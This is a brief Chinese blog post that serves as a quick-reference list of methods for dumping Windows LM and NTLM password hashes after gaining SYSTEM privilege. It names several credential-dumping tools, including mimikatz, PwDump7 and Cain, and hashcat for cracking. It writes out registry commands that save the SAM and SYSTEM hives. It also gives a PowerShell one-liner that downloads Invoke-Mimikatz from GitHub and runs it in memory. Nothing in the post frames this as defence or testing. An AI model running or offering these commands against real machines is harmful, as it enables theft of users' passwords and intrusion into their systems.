Windows系统LM Hash和NTLM Hash凭证获取方法速查

我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17169904.html

凭证获取需要System权限。

1、使用GetPass工具
2、使用PwDump7工具
3、使用QuarksPwDump工具(报毒)
4、使用命令导出 reg save hklm\sam sam.hivereg save hklm\system system.hive SAM文件
5、使用mimikatz工具读内存、自动获取本机SAM、读取4导出的文件、读取导出的lsass.exe进程的dmp文件、
6、使用Cain工具读取4中的文件
7、使用Nishang的Get-PassHashes.ps1脚本
8、使用PowerShell远程加载mimikatz powershell IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz
https://github.com/PowerShellMafia/PowerSploit 也提供了多种powershell脚本
9、使用hashcat破解hash
10、解析windows的ntds.dit文件

posted @ 2023-03-07 20:40  我超怕的  阅读(283)  评论(0编辑  收藏  举报